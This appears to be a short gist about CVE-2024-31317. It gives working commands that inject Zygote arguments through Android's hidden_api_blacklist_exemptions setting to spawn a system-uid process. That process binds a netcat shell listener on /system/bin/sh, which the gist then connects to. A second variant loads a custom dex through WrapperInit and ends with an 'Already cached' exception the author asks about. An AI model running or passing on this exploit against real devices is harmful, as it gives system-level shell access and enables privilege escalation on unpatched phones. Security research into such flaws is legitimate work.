CVE-2024-31317

gistfile1.txt

am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234

Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this

settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"

But it is throwing Already Cached excpetion

java.lang.IllegalStateException: Already cached. at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148) at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374) at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144) at com.android.internal.os.WrapperInit.main(WrapperInit.java:83) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)